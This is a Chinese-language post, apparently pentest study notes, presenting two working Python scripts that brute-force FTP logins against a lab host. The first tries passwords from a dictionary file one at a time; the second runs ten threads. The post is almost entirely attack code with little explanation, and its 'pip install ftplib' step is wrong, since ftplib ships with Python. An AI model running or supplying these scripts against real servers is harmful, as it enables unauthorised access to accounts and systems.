本文最后更新于 420 天前,其中的信息可能已经有所发展或是发生改变。
:::info
💘渗透全流程:
信息收集 – 漏洞发现 – 漏洞👣利用 – 权限提升 – 隧道搭建 – 内网渗透 – 横向移动 – 后渗透
:::
FTP 爆破
pip install ftplib
V1.0
#! /usr/bin/env python
'''
FTP 爆破
'''
import ftplib
host = '192.168.225.128'
port = 21
user = 'ftpuser'
# passwd = ''
passwords = open('password_dict.txt').read().split('\n')
def connect_ftp(passwd):
# 创建 ftp 客户端
ftp_client = ftplib.FTP()
try:
ftp_client.connect(host=host, port=port, timeout=5)
ftp_client.login(user=user, passwd=passwd)
except ftplib.error_perm:
return False
else:
print('[+] password found: %s' % passwd)
ftp_client.quit()
return True
for passwd in passwords:
if connect_ftp(passwd):
break
V2.0
优化:
#! /usr/bin/env python
'''
FTP 爆破
优化:多线程
'''
import ftplib
from threading import Thread
import queue
host = '192.168.225.128'
port = 21
user = 'ftpuser'
# passwd = ''
passwords = []
with open('password_dict.txt', 'r') as f:
passwords = f.read().split('\n')
q_threads = queue.Queue()
n_threads = 10
def connect_ftp():
# 创建 ftp 客户端
# ftp_client = ftplib.FTP()
# try:
# ftp_client.connect(host=host, port=port, timeout=5)
# ftp_client.login(user=user, passwd=passwd)
# except ftplib.error_perm:
# return False
# else:
# print('[+] password found: %s' % passwd)
# ftp_client.quit()
# return True
...
passwd = q_threads.get()
ftp_client = ftplib.FTP()
print('[*] trying %s' % passwd)
try:
ftp_client.connect(host=host, port=port, timeout=5)
ftp_client.login(user=user, passwd=passwd)
except ftplib.error_perm:
return False
else:
print('[+] password found: %s ' % passwd)
with q_threads.mutex:
q_threads.queue.clear()
q_threads.all_tasks_done.notify_all()
q_threads.unfinished_tasks = 0
finally:
try:
q_threads.task_done()
except:
exit(0)
for passwd in passwords:
q_threads.put(passwd)
for t in range(n_threads):
thread = Thread(target=connect_ftp)
thread.daemon = True
thread.start()